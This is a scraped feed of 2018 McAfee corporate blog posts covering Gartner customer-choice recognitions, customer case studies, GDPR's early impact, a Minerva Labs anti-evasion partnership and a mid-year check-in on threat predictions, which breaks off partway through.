The Gartner Peer Insights Customers’ Choice logo is a trademark and service mark of Gartner, Inc., and/or its affiliates, and is used herein with permission. All rights reserved. Gartner Peer Insights Customers’ Choice constitute the subjective opinions of individual end-user reviews, ratings, and data applied against a documented methodology; they neither represent the views of, nor constitute an endorsement by, Gartner or its affiliates.

The post McAfee Named a 2018 Gartner Peer Insights Customers’ Choice for Endpoint Protection Platforms appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/endpoint-security/mcafee-named-a-2018-gartner-peer-insights-customers-choice-for-endpoint-protection-platforms/feed/ 0
Extending Security to the Public Cloud is the Easy Part https://securingtomorrow.mcafee.com/business/extending-security-to-the-public-cloud-is-the-easy-part/ https://securingtomorrow.mcafee.com/business/extending-security-to-the-public-cloud-is-the-easy-part/#respond Thu, 06 Dec 2018 16:00:57 +0000 https://securingtomorrow.mcafee.com/?p=92929

“The biggest challenge of securing the public cloud isn’t technical.” That’s the opinion of an IT security analyst at a large U.S. government contractor. He should know. In the last year, his company rolled out a multi-tiered cloud environment, with instances in Amazon Web Services (AWS) as well as on premises. For this company, which […]

The post Extending Security to the Public Cloud is the Easy Part appeared first on McAfee Blogs.

]]>

“The biggest challenge of securing the public cloud isn’t technical.”

That’s the opinion of an IT security analyst at a large U.S. government contractor. He should know. In the last year, his company rolled out a multi-tiered cloud environment, with instances in Amazon Web Services (AWS) as well as on premises.

For this company, which administers federal and state programs that directly assist a broad sector of the American population, leveraging the public cloud made sense. Using the cloud would reduce total cost of ownership (TCO), provide clients and end users with easier access to their information via web-based portals, and enable quickly ramping up or scaling down bandwidth requirements to support the widely fluctuating number of users across projects. However, cybersecurity was a critical concern.

Fast, easy deployment of cloud protection and highly granular policies

Before launching its first contracted project using a public cloud, the company thoroughly researched its cloud security options. Based on its research, the company decided to implement McAfee Cloud Workload Security to bolster the security of data within AWS. “With McAfee Cloud Workload Security, we can get very granular with our policies,” the systems analyst said. “It is a very powerful tool in [the cloud] environment. We are able to be very proactive in pushing out to endpoints [in the cloud] what they need.”

By bridging native AWS API driven data sources such as GuardDuty with a cloud workload protection platform like McAfee Cloud Workload Security (CWS), tenants of AWS can use the data-rich sources of AWS within CWS manage and secure mission critical workloads with advanced security from a single console.

Since the company’s security team already relied on the McAfee integrated security platform and McAfee ePolicy Orchestrator (McAfee ePO) management console, deploying McAfee Cloud Workload Security was simple and took less than a week. Once the solution and its components were implemented, the company had end-to-end visibility into all cloud workloads and their underlying platforms plus insights into weak security controls, unsafe firewall and encryption settings, and indicators of compromise (IoCs).

Small IS team easily adds management of cloud protection

The company supports its 15,000 professionals and 35,000 endpoints with an information security team of only five people spread across three locations. Such a lean staff is possible primarily thanks to McAfee ePO. Adding cloud protection to the company’s security arsenal required no additional staff. The team simply extended its ability to easily set policies and monitor and manage endpoint protection from on premises into the cloud.

“Whether on premises or in the cloud, we can easily add or customize policies to meet the security needs of each specific contract and project,” the systems analyst said. “McAfee has made it very easy to bring in new workloads.” For example, one of the company’s projects involves multiple federal agencies and multiple types of workloads. These workloads include SQL and Oracle databases, imaging software (since volumes of documents must be stored digitally for years), and agency-specific and contract-specific applications.

The real challenge of securing the cloud

So, what is the difficult part of securing the public cloud?

According to the systems analyst, “The biggest challenge is overcoming the perception that the cloud can’t be secured. We have had to educate both internally and externally that we can extend our existing threat defenses beyond our physical infrastructure to the public cloud. Education is ongoing, but our success thus far at securely leveraging the public cloud is converting the naysayers.”

To read a case study and learn about how the company relies on McAfee to secure the cloud, click here. To watch a video of the systems analyst talking about his experience with McAfee, please view below.

The post Extending Security to the Public Cloud is the Easy Part appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/extending-security-to-the-public-cloud-is-the-easy-part/feed/ 0
‘Together is Power’ Means Collaboration https://securingtomorrow.mcafee.com/business/together-is-power-means-collaboration/ https://securingtomorrow.mcafee.com/business/together-is-power-means-collaboration/#respond Mon, 01 Oct 2018 16:16:37 +0000 https://securingtomorrow.mcafee.com/?p=91695

Crozer-Keystone Health System in Pennsylvania comprises five hospitals and operates several outpatient centers, a sports club, and a comprehensive physician network of primary-care and specialty practices. Systems Engineer Michael Mize works daily to protect the sensitive data of thousands of patients served by more than 1,000 physicians and 6,000 total employees. Mize has seen first-hand how the threat […]

The post ‘Together is Power’ Means Collaboration appeared first on McAfee Blogs.

]]>

Crozer-Keystone Health System in Pennsylvania comprises five hospitals and operates several outpatient centers, a sports club, and a comprehensive physician network of primary-care and specialty practices. Systems Engineer Michael Mize works daily to protect the sensitive data of thousands of patients served by more than 1,000 physicians and 6,000 total employees. Mize has seen first-hand how the threat landscape has evolved over time and is adapting priorities accordingly.  

To be effective today, security teams must get more efficient. Mize incorporates the advanced capabilities of technology into the SOC to help staff work more productively. For example, by moving to McAfee Endpoint Security (ENS) 10, machine learning will help block malicious threats, freeing up security professionals to focus on higher-level tasks. But Mize also understands the value of building a comprehensive culture of security to create a truly secure environment. “’Together is power’ to me means collaboration,” says Mize. Crozer-Keystone brings this to life by working with other security professionals across the industry but also by focusing on educating its own employees. 

Mize describes a good day as one when users proactively reach out after receiving something they think might be a phishing attempt. Developing this kind of security-first mindset among staff doesn’t come automatically, so it’s good to see results from their training and reinforcement efforts. His team releases a monthly IT security bulletin on specific topics, such as phishing or physical security. In addition, the company provides a toll-free IT Security Incident hotline for reporting any suspicious problems and encourages unusual issues be reported to anyone in IT. 

Crozer-Keystone also partners with other organizations, attending events like MPOWER, to learn more about the security landscape and understand what solutions are available. Mize says it’s important to collaborate with others in the same situation to help his team better understand what they’re doing right, where they can improve and what both parties can do together moving forward. To illustrate this, whenever he encounters an outside organization with a user who has had their email account hacked – via a phishing email that reached his system, for example – he calls their help desk to connect with his peer at their business. He then describes what he’s observed and provides instructions for how he recommends they correct the issue.  

“I do this as a courtesy because we should all be looking out for each other even though it may take a few minutes out of our day. Maybe other security professionals will share this mindset and be more willing to help each other.” 

Hear more from Michael Mize on the impact of growing up with McAfee and how collaboration is making a difference at Crozer-Keystone in this video. 

The post ‘Together is Power’ Means Collaboration appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/together-is-power-means-collaboration/feed/ 0
Using Security-First Strategies to Keep Customer Data Safe https://securingtomorrow.mcafee.com/business/using-security-first-strategies-to-keep-customer-data-safe/ https://securingtomorrow.mcafee.com/business/using-security-first-strategies-to-keep-customer-data-safe/#respond Wed, 29 Aug 2018 17:01:53 +0000 https://securingtomorrow.mcafee.com/?p=91301

MGM Resorts International operates 27 resort properties worldwide, including more than 420 bars and restaurants and 282 retail establishments. SVP, Chief Information Security Officer Scott Howitt oversees security for the entire global enterprise, which encompasses 20,000 endpoints, various operating systems, and applications that span the gaming, hospitality, entertainment, food and beverage, retail and hotel industries. […]

The post Using Security-First Strategies to Keep Customer Data Safe appeared first on McAfee Blogs.

]]>

MGM Resorts International operates 27 resort properties worldwide, including more than 420 bars and restaurants and 282 retail establishments. SVP, Chief Information Security Officer Scott Howitt oversees security for the entire global enterprise, which encompasses 20,000 endpoints, various operating systems, and applications that span the gaming, hospitality, entertainment, food and beverage, retail and hotel industries. MGM Resort International’s reputation rests heavily on keeping its customers data safe and secure.

Howitt and his team work relentlessly to block threats and mitigate risk as quickly and efficiently as possible. He has overseen the transformation of MGM Resort International’s security ecosystem and continues to evolve it to stay ahead of ever-changing threats. Implementation of solutions such as McAfee Investigator and use of the Open Data Exchange Layer (OpenDXL) have reduced the time needed to block and remediate threats, keeping its businesses and customers safer. Howitt has also adopted some key strategies on top of these critical tools to help build a culture of security among his team.

Continually adapt and learn

Keeping ahead of zero-day attacks and new advanced threats requires a security infrastructure that continually gets smarter. By bringing in innovative technologies, such as machine learning and AI used by McAfee Investigator, MGM Resorts International’s defenses can adapt and learn to protect, detect, and correct faster.

Leverage technology that advances team learning

Using McAfee’s Investigator tool has also matured the team, helping them learn from each other. By providing greater continuity in the handoffs during an incident response process, everyone has a clearer view of the investigation, leading to increased efficiency. This also makes it easier to transfer knowledge from veteran staff to newer team members via the tool, advancing the team much faster.

Think longer term and build a layered defense architecture

The company has moved over the years from a security environment made up of a collection of point solutions to an adaptive ecosystem of interconnected security solutions and services that work together. McAfee Threat Intelligence Exchange and OpenDXL have supported Howitt in realizing this vision of a comprehensive, layered defense architecture. This approach not only helped build a more integrated security environment, but vendor consolidation saved money and simplified operational overhead.

Use the community

Once a quarter MGM Resorts International gathers representatives from McAfee and its three other major security partners to discuss possible use cases and how to leverage OpenDXL. Howitt admits their partners were hesitant at first to work closely with competitors, but they embraced it when they saw how working together could make their tools more efficient and powerful through collaboration. “… the more collaboration you have, the more likely you are to find better ways to use a tool or make it work better and be more secure,” says Howitt.

Learn more about how MGM Resorts International works with McAfee to make its businesses and customer safer using a security-first approach.

The post Using Security-First Strategies to Keep Customer Data Safe appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/using-security-first-strategies-to-keep-customer-data-safe/feed/ 0
Creating Ripples: The Impact and Repercussions of GDPR, So Far https://securingtomorrow.mcafee.com/business/data-security/creating-ripples-the-impact-and-repercussions-of-gdpr-so-far/ https://securingtomorrow.mcafee.com/business/data-security/creating-ripples-the-impact-and-repercussions-of-gdpr-so-far/#respond Tue, 28 Aug 2018 14:00:35 +0000 https://securingtomorrow.mcafee.com/?p=91106

“GDPR is coming, GDPR is coming!” For months this was all we heard – everyone was discussing GDPR’s impending arrival on May 25th, 2018, and what they needed to do to prepare for the new privacy regulation. GDPR – the General Data Protection Regulation – first came to fruition on April 14th, 2016, as a replacement […]

The post Creating Ripples: The Impact and Repercussions of GDPR, So Far appeared first on McAfee Blogs.

]]>

“GDPR is coming, GDPR is coming!” For months this was all we heard – everyone was discussing GDPR’s impending arrival on May 25th, 2018, and what they needed to do to prepare for the new privacy regulation. GDPR – the General Data Protection Regulation – first came to fruition on April 14th, 2016, as a replacement for the EU’s former legislation, Data Protection Directive. At its core, GDPR is designed to give EU citizens more control over their personal data. But in order for that control to be placed back in consumers’ hands, organizations have to change the way they do business. In fact, just five months after the implementation date, we’ve already seen GDPR leave an impact on companies. Let’s take a look at the ramifications that have already come to light because of GDPR, and how the effects of the legislation may continue to unfold in the future.

Even though the EU gave companies two years to ensure compliance, many waited until the last minute to act. Currently, no one has been slapped with the massive fines, but complaints are already underway. In fact, complaints have been filed against Google, Facebook, and its subsidiaries, Instagram and WhatsApp. Plus, Max Schrem’s None of Your Business (NOYB) and the French association La Quadrature du Net have been busy filing complaints all around Europe. “Data Protection officials have warned us that they will be aggressively enforcing the GDPR, and they watch the news reports. European Economic Area (EEA) residents are keenly aware of the Regulation and its requirements, and are actively filing complaints,” said Flora Garcia, McAfee’s lead privacy and security attorney, who managed our GDPR Readiness project.

However, the ramifications are not just monetary, as the regulation has already affected some organizations’ user bases, as well as customer trust. Take Facebook for example – the social network actually attributes the loss of 1 million monthly active users to GDPR, as reported in their second quarter’s earnings. Then there’s British Airlines, who claims in order to provide online customer service and remain GDPR compliant, their customers must post personal information on social media. Even newspapers’ readership has been cut down due to the legislation, as publications such as the Los Angeles Times and Chicago Tribune stopped allowing European readers access to their sites in order to avoid risk. “This is the new normal, and all companies need to be aware of their GDPR obligations. Companies outside of the EEA who handle EEA data need to know their obligations just as well as the European companies,” Garcia says.

GDPR has had tactical repercussions too; for instance, it has changed the communication on the way the IT sector stores customer data. A consumer’s ‘right to be forgotten’ means organizations have to clearly explain how a customer’s data has been removed from internal systems when they select this option, but also ensure a secure backup copy remains. GDPR also completely changes the way people view encrypting and/or anonymizing personal data.

What’s more — according to Don Elledge, guest author for Forbes, GDPR is just the tip of the iceberg when it comes to regulatory change. He states, “In 2017, at least 42 U.S. states introduced 240 bills and resolutions related to cybersecurity, more than double the number the year before.” This is largely due to the visibility of big data breaches (Equifax, Uber, etc.), which has made data protection front-page news, awakening regulators as a result. And with all the Facebook news, the Exactis breach, and the plethora of data leaks we’ve seen this so far this year, 2018 is trending in the same direction. In fact, the California Consumer Privacy Act of 2018, which will go into effect January 1st, 2020, is already being called the next GDPR. Additionally, Brazil signed a Data Protection Bill in mid-August, which is inspired by GDPR, and is expected to take effect in early 2020. The principles are similar, and potential fines could near 12.9 million USD. And both China and India are currently working on data protection legislation of their own as well.

So, with GDPR already creating ripples of change and new, similar legislation coming down the pipeline, it’s important now more than ever that companies and consumers alike understand how a piece of data privacy legislation affects them. Beyond that, companies must plan accordingly so that their business can thrive while remaining compliant.

To learn more about GDPR and data protection, be sure to follow us at @McAfee and @McAfee_Business, and check out some of our helpful resources on GDPR.

 

The information provided on this GDPR page is our informed interpretation of the EU General Data Protection Regulation, and is for information purposes only and it does not constitute legal advice or advice on how to achieve operational privacy and security. It is not incorporated into any contract and does not commit promise or create any legal obligation to deliver any code, result, material, or functionality. Furthermore, the information provided herein is subject to change without notice, and is provided “AS IS” without guarantee or warranty as to the accuracy or applicability of the information to any specific situation or circumstance. If you require legal advice on the requirements of the General Data Protection Regulation, or any other law, or advice on the extent to which McAfee technologies can assist you to achieve compliance with the Regulation or any other law, you are advised to consult a suitably qualified legal professional. If you require advice on the nature of the technical and organizational measures that are required to deliver operational privacy and security in your organization, you should consult a suitably qualified privacy professional. No liability is accepted to any party for any harms or losses suffered in reliance on the contents of this publication.

 

The post Creating Ripples: The Impact and Repercussions of GDPR, So Far appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/data-security/creating-ripples-the-impact-and-repercussions-of-gdpr-so-far/feed/ 0
Minerva’s Anti-Evasion Platform as Part of the McAfee Ecosystem https://securingtomorrow.mcafee.com/other-blogs/mcafee-partners/minervas-anti-evasion-platform-as-part-of-the-mcafee-ecosystem/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-partners/minervas-anti-evasion-platform-as-part-of-the-mcafee-ecosystem/#respond Fri, 24 Aug 2018 14:00:57 +0000 https://securingtomorrow.mcafee.com/?p=91223 This blog was written by Lenny Zeltser, VP of Products at Minerva Labs. What drives two endpoint security vendors to work together? The recognition that customers will benefit from the unique advantages of each company’s technologies. Useful defensive approaches that work in tandem are stronger together than they are when deployed independently. With this in mind, […]

The post Minerva’s Anti-Evasion Platform as Part of the McAfee Ecosystem appeared first on McAfee Blogs.

]]>
This blog was written by Lenny Zeltser, VP of Products at Minerva Labs.

What drives two endpoint security vendors to work together? The recognition that customers will benefit from the unique advantages of each company’s technologies. Useful defensive approaches that work in tandem are stronger together than they are when deployed independently. With this in mind, Minerva’s Anti-Evasion Platform is now certified by McAfee to work within the ePO ecosystem. Here’s why this is valuable for McAfee and Minerva customers.

Using Deception to Increase Prevention Efficacy

Despite the modern advancements in antivirus approaches, such as the use of artificial intelligence, attackers keep succeeding at slipping past such enterprise defenses. That’s the nature of the cat-and-mouse dynamics, which describe any approach that aims to distinguish between malicious and legitimate files. Minerva’s Anti-Evasion Platform uses a different approach to automatically prevent infections that involve evasion tactics.

The notion that the effectiveness of cybersecurity tools decreases over time is captured in Grobman’s Curve. Steve Grobman, the CTO for McAfee, developed this principle to explain that advancements in security technologies indirectly weaken their own efficacy by motivating attackers to develop evasive countermeasures. Minerva’s Anti-Evasion Platform’s methodology operates in a way that compensates for this degradation.

Minerva’s approach doesn’t involve scanning files or tracking processes to detect malicious code. Therefore, it doesn’t compete with or replace the need for antivirus software such as McAfee Endpoint Security. Instead, Minerva’s Anti-Evasion Platform uses elements of deception on the endpoint to cause malware to self-convict and terminate itself if it engages in evasive behavior.

For example, Minerva’s software makes every endpoint in the enterprise look like the analysis environment that malicious code is often designed to avoid. This aspect of the solution is called Hostile Environment Simulation. This is just one of the ways in which Minerva automatically prevents intrusions without requiring human intervention, manual configuration or professional services.

Minerva forces adversaries to make a choice: Use evasion and be subject to Minerva’s interference, or avoid such tactics and get caught by antivirus. As the result, McAfee Endpoint Security, augmented with Minerva’s Anti-Evasion Platform deliver significantly broader threat coverage than any other solution on the market.

Using Evasion Tactics Against the Adversary

As the McAfee Labs Threat Report that focused on evasion pointed out, “There are hundreds, if not thousands, of anti-security, anti-sandbox, and anti-analyst evasion techniques employed by malware authors. Many can be purchased off the shelf.” Gone are the days when attackers needed to possess advanced expertise to use such technologies.

Tactics for bypassing anti-malware tools eventually yield results, leading to costly investigative activities and losses associated with the compromise of sensitive data. Minerva’s focus on interfering with evasion methods is unusual in that the more evasive the threat, the easier it is for Minerva’s Anti-Evasion Platform to prevent the compromise.

For instance, Minerva examined the extent to which evasion tactics are used by modern exploit kits. We analyzed the points in the attack paths that involved some form of evasion, such as the avoidance of malware analysis tools. 99% of the examined attacks involved at least one evasion tactic somewhere along the path. Such techniques are designed to increase the likelihood that the attack succeeds. In contrast, the very use of evasion as part of the attack allows Minerva’s Anti-Evasion Platform to protect endpoints even if other security controls would’ve failed.

With Minerva, the very tactics that have historically given adversaries the upper hand, give defenders an advantage in protecting endpoints.

Enhanced Protection without Operational Burdens

The passive nature of Minerva’s technology allows customers to benefit from its protection without endpoint performance concerns. Moreover, Minerva’s integration with ePolicy Orchestrator (ePO) allows McAfee customers to deploy and operate Minerva’s Anti-Evasion Platform without operational burdens often associated with standalone agents.

It’s now possible to deploy Minerva via McAfee ePO software for all Microsoft Windows operation systems (Windows XP or above, including servers) across the enterprise. No reboot is required for installing, upgrading or uninstalling the Minerva agent. McAfee customers can also use ePO to centrally monitor and feed new threat intelligence of all evasive threats prevented by Minerva’s Anti-Evasion Platform.

In another example of Minerva working together with McAfee technologies, Minerva’s agent can interact with other components of the McAfee ecosystem using the Data Exchange Layer (DXL), which allows DXL-compatible solutions to collaborate on strengthening enterprise defenses. For instance, if Minerva’s Anti-Evasion Platform stops an evasive threat, Minerva can use DXL to share information about the malicious artifact with other DXL-compatible technologies. You can see this approach in action in Minerva’s video that illustrates the power of this approach.

Minerva’s participation in the McAfee ecosystem increases the efficacy of the joint solution to stop attacks. The ePO integration allows enterprises to accomplish this easily and efficiently. DXL makes it possible to share Minerva’s unique advantage with other compatible technologies and reinforces the notion that security is a team sport. To see this approach in action, reach out to Minerva for a demo.

About Minerva Labs

Minerva Labs is an award-winning, innovative endpoint security solution provider that protects enterprises from today’s stealthiest attacks, without the need to detect threats first—all before any damage has been done. The Minerva Anti-Evasion Platform blocks unknown threats that evade existing defenses by deceiving the malware and controlling how it perceives its environment.

About McAfee

McAfee is the device-to-cloud cybersecurity company. Inspired by the power of working together, McAfee creates business and consumer solutions that make our world a safer place for the benefit of all. McAfee’s holistic, automated open security platform allows all your disparate products to co-exist, communicate, and share threat intelligence with each other anywhere in the digital landscape.

About Author

Lenny Zeltser is a seasoned business and tech leader with extensive cybersecurity experience. He heads Product Management at Minerva Labs. Lenny also trains incident response and digital forensics professionals at SANS Institute. He has earned the prestigious GIAC Security Expert designation, has an MBA from MIT Sloan and a Computer Science degree from the University of Pennsylvania.

The post Minerva’s Anti-Evasion Platform as Part of the McAfee Ecosystem appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-partners/minervas-anti-evasion-platform-as-part-of-the-mcafee-ecosystem/feed/ 0
Brazilian Educational Organization Gets High Marks for Innovation Leadership with Integrated Security from McAfee https://securingtomorrow.mcafee.com/business/brazilian-educational-organization-gets-high-marks-for-innovation-leadership-with-integrated-security-from-mcafee/ https://securingtomorrow.mcafee.com/business/brazilian-educational-organization-gets-high-marks-for-innovation-leadership-with-integrated-security-from-mcafee/#respond Wed, 15 Aug 2018 13:00:55 +0000 https://securingtomorrow.mcafee.com/?p=90765 Furthering the cause of education in Brazil is the mission that fuels SOMOS Educação’s laser-focused drive toward technology and innovation—and McAfee is playing a pivotal role in that transformation. As CIO Juliano Pereira points out, “Compared to 99% of the educational organizations in Brazil, we are way ahead of the game”—and, in large part, it’s […]

The post Brazilian Educational Organization Gets High Marks for Innovation Leadership with Integrated Security from McAfee appeared first on McAfee Blogs.

]]>
Furthering the cause of education in Brazil is the mission that fuels SOMOS Educação’s laser-focused drive toward technology and innovation—and McAfee is playing a pivotal role in that transformation. As CIO Juliano Pereira points out, “Compared to 99% of the educational organizations in Brazil, we are way ahead of the game”—and, in large part, it’s a result of embracing McAfee’s connected security ecosystem.

As one of the biggest K through 12 educational groups in Brazil, SOMOS Educação provides a comprehensive portfolio of integrated educational textbooks, digital products, and services, including the administration of preparatory courses and exams. The organization’s push toward innovation is evidenced by its recent migration of instructional systems and applications to the cloud. And, alongside that effort, SOMOS Educação, with enthusiastic support from its board of directors, is making a significant investment in strengthening, unifying, and streamlining its security architecture at every touch point—servers, endpoints, and databases.

CIO Juliano Pereira and lean team of devoted and seasoned IT and security professionals are determined to ensure a more secure and consistent experience for the students who use their services, their parents, and SOMOS Educação’s 5,500 employees, who are distributed across 50 locations nationwide. Personal privacy, data protection, and building a solid and reliable defense against advanced threats like the recent WannaCry ransomware outbreak top their list of security priorities.

To that end, Pereira and his team selected McAfee as the organization’s primary security vendor, primarily because of the McAfee integrated approach to security and the simple, single-pane-of-glass management capabilities via the McAfee ePolicy Orchestrator (McAfee ePO) console. The organization started its journey with McAfee by deploying McAfee Endpoint Security, which provides a single platform with an array of defenses—everything from web protection to ensure safe browsing to scanning that uncovers vulnerabilities to behavioral analysis and machine learning to detect advanced and zero-day threats.

Next on the agenda was implementation of McAfee DLP Endpoint, which has had a marked impact on the organization’s culture and on those who make use of its educational services. Pereira has made a point of informing all the organization’s constituents about these added data security controls as a way of heightening security awareness among employees and giving external users greater peace of mind. “Students and their parents will feel more at ease, and employees will be more mindful about the way they use and transmit data,” says Pereira.

At the heart of SOMOS Educação’s updated security architecture is the McAfee ePO console (video below), which has considerably elevated the security team’s efficiency and capabilities by consolidating management tasks, facilitating enforcement of data protection policies, and offering an unprecedented level of visibility and reporting. As an example, Pereira points out that the McAfee ePO console revealed that McAfee had thwarted 1,065 threats in a week’s time.

Migration of student services to the cloud, which Pereira sees as both inevitable and necessary, prompted him to adopt McAfee Web Protection, which provides consistent protection and policies both on premises and in the cloud.

SOMOS Educação’s journey to innovation and better cybersecurity has just begun, but already the organization has made great strides. Pereira and this team are proud of the progress they’ve made so far and look forward to expanding the depth and breadth of their cutting-edge cybersecurity architecture and to serving as an example for other organizations in the education sector.

“We are at the beginning of our journey, and we still have far to go before we achieve all our goals, but we take pride in the fact that we are leading the way when it comes to cybersecurity. When our schools hear that we are providing them with stronger security, they are really pleased and receptive,” affirms Pereira.

To read the full case study, click here.

The post Brazilian Educational Organization Gets High Marks for Innovation Leadership with Integrated Security from McAfee appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/brazilian-educational-organization-gets-high-marks-for-innovation-leadership-with-integrated-security-from-mcafee/feed/ 0
Gartner Peer Insights Recognition for McAfee SIEM https://securingtomorrow.mcafee.com/business/security-operations/gartner-peer-insights-recognition-for-mcafee-siem/ https://securingtomorrow.mcafee.com/business/security-operations/gartner-peer-insights-recognition-for-mcafee-siem/#respond Wed, 01 Aug 2018 21:03:46 +0000 https://securingtomorrow.mcafee.com/?p=90634 This blog was written by Peter Elliman. I’m proud to say that McAfee has received recognition from our customers with the 2018 Gartner Peer Insights Customers’ Choice for the Security Information and Event Management (SIEM). This is a recognition of high satisfaction from a number of reviews by verified end-user professionals. To ensure fair evaluation, […]

The post Gartner Peer Insights Recognition for McAfee SIEM appeared first on McAfee Blogs.

]]>
This blog was written by Peter Elliman.

I’m proud to say that McAfee has received recognition from our customers with the 2018 Gartner Peer Insights Customers’ Choice for the Security Information and Event Management (SIEM). This is a recognition of high satisfaction from a number of reviews by verified end-user professionals. To ensure fair evaluation, Gartner maintains rigorous criteria for recognizing vendors with a high customer satisfaction rate.

If you don’t know much about our SIEM product — McAfee Enterprise Security Manager (ESM) — I encourage you to read a blog post published back in March (Is Your SOC Caught in the Slow Lane) for more details. ESM 11 is a modern SIEM, which we define as having an open and scalable data architecture, advanced analytical capabilities and the ability to quickly enrich and share relevant data.

And while Gartner has named McAfee a Leader in the “Magic Quadrant for Security Information and Event Management (SIEM)” over the past 7 years ¹, something that makes us proud, we are most appreciative of our customers who support our technologies and share their opinions through forums like Gartner Peer Insights. We believe the voice and passion of our customers is critical to our success and motivates us each day.

McAfee’s corporate tag line is “Together is Power.” We are stronger when we work together – with customers and partners. Put another way, we recognize that organizations, and in this context, security operations teams, use a wide range of tools, which is why our Security Operations platform, which includes our SIEM, is strengthened by the many partners in our Security Innovation Alliance (SIA). Time to value is important when bringing new tools into customer environment. And while we know many companies want to reduce the number of tools used in their environment, research shows 25% of security events go unanalyzed. And 39% of cybersecurity organizations manually collect, process, and analyze external intelligence feeds. That means there is room for solutions like ESM, which can reduce complexity and improve critical security outcomes, such as mean time to detection and mean time to respond, and efficiently address critical compliance requirements.

Gartner Peer Insights Customers’ Choice distinctions are determined by the subjective opinions of individual end-user customers based on their own experiences, the number of published reviews on Gartner Peer Insights, and overall ratings for a given vendor in the market, as further described here, and are not intended in any way to represent the views of Gartner or its affiliates.

¹Gartner Magic Quadrant for Security Information and Event Management, Kelly M. Kavanagh, Toby Bussa, 4 December 2017. From 2015-16, McAfee was listed as Intel Security, and in 2011, McAfee was listed as Nitro Security since it acquired the company in 2011.   

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

The post Gartner Peer Insights Recognition for McAfee SIEM appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/security-operations/gartner-peer-insights-recognition-for-mcafee-siem/feed/ 0
Checking In Halfway: The McAfee Labs 2018 Threats Predictions https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/checking-in-halfway-the-mcafee-labs-2018-threats-predictions/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/checking-in-halfway-the-mcafee-labs-2018-threats-predictions/#respond Tue, 26 Jun 2018 18:26:25 +0000 https://securingtomorrow.mcafee.com/?p=90125 Time flies when you’re fighting cybercrime. Now that’s not exactly how the phrase goes, but for us at McAfee, it’s hard to believe that we’re already almost halfway through 2018. It seems like just yesterday we were predicting the types of cyberthreats we would see throughout this year with our McAfee Labs 2018 Threats Predictions […]

The post Checking In Halfway: The McAfee Labs 2018 Threats Predictions appeared first on McAfee Blogs.

]]>
Time flies when you’re fighting cybercrime. Now that’s not exactly how the phrase goes, but for us at McAfee, it’s hard to believe that we’re already almost halfway through 2018. It seems like just yesterday we were predicting the types of cyberthreats we would see throughout this year with our McAfee Labs 2018 Threats Predictions Report. From the machine learning arms race to the home becoming the ultimate storefront, it looked like we had a quite a year ahead of us. But in reality, not all these predictions can to fruition. And conversely, some unraveled in ways we didn’t imagine. Let’s take a look at what predictions became reality, and what may still lay ahead for the cybersecurity industry in 2018.

The First Half of 2018

Ransomware Pivots to New Targets, New Objectives

The Prediction

In November of last year, we predicted 2018 was going to be colored by ransomware attacks that were anything but ordinary. These attacks could pivot away from traditional, individual extortion, and rather aim to sabotage or disrupt organizations.

The Verdict

Ransomware attacks have seen a pivot, last year we witnessed the WannaCry ransomware attacks, which spread like wildfire to hundreds of thousands of devices, but this year’s ransomware attacks have reshaped their focus, completely moving away from the individual attack. With disruption as an objective, these attacks managed to shut down both critical and personal services. As of June 2018, an Ohio police and fire department, a Minnesota psychiatric provider, and even a family planning clinic have all been victims of a ransomware attack, proving threat actors will stop at almost nothing in order to cause a bit of chaos.

The Adversarial Machine Learning Arms Race Revs Up

The Prediction

Late last year, our Labs team discussed how the influence of machine learning will be felt on both sides of the equation – white hats will ramp up their AI/ML defenses, while cybercriminals will tap into the technology’s power to enact advanced attacks. With machines working for anyone, an arms race would be fueled, and machine-supported actions would increase from both defenders and attackers.

The Verdict

Machine learning and AI are very present in the arsenal of cyber defenders, as the industry has become fairly successful at applying AI to malware detection and user and entity behavior analytics (UEBA) by using deep neural networks and anomaly detection. In fact, the use of this technology and application of human-machine teaming has been cited as a reason top talent will accept a job at a cybersecurity firm in the first place. However, we have yet to see them actively leveraged by cybercriminals in attacks this year.

In lieu of AI, attacks in 2018 have rather used more traditional techniques, but for non-traditional purposes. Just take Operation Honeybee as an example – the attacked leveraged malicious documents, which is typically known as an older attack vector, but set its sights on a unique type of target: humanitarian aid groups. Honeybee also ladders back to a larger trend seen throughout the first half of this year – threats have new targets, and certainly new objectives.

When Your Home Becomes the Ultimate Storefront

The Prediction

The growth of smart home devices is nothing new, but the way they’re leveraged by corporations has changed over time. We predicted 2018 to be no exception, companies creating these devices have powerful incentives to observe what consumers are doing in their homes and learn from their behaviors. We foresaw these corporations exploring new ways to capture consumer data and adjusting terms and conditions in order to avoid getting fined.

The Verdict

The monetization and use of consumer data have been huge topics of discussion in 2018, but not because of the IoT industry yet. Rather, the now infamous Facebook Cambridge Analytica incident stirred up quite the debate earlier this year around what companies are doing with consumer data.

In 2018, IoT devices are being used to spy – but not by corporations. Cybercriminals are continuing to use vulnerable IoT devices to their advantage, swooping data and spying on families as a result of device vulnerabilities. From smart TVs to baby monitors, the handful of IoT attacks in 2018 have proved that these devices still have ways to go when it comes to a solid security posture.

The Next Six Months

Serverless Apps: New Opportunities for Friend and Foe

The Prediction

Cybercriminals will take advantage of convenient opportunities as they arise, which is precisely why our team predicted that threat actors will jump on serverless apps this year, using their greater granularity as a chance to increase the attack surface and steal data in transit across a network.

The Verdict 

As of now, major attacks against serverless apps have yet to be seen. Mind you, it could soon become a reality, as researchers have recently figured out how to turn serverless apps into sources for crypto-mining. These researchers are in the minority, as many IT professionals don’t really understand the new technology and all the cyber risk associated with it – which in itself can pose the biggest risk of all. In fact, many security professionals lack the basic skills required to understand and secure this technology.

Inside Your Child’s Digital Backpack

The Prediction

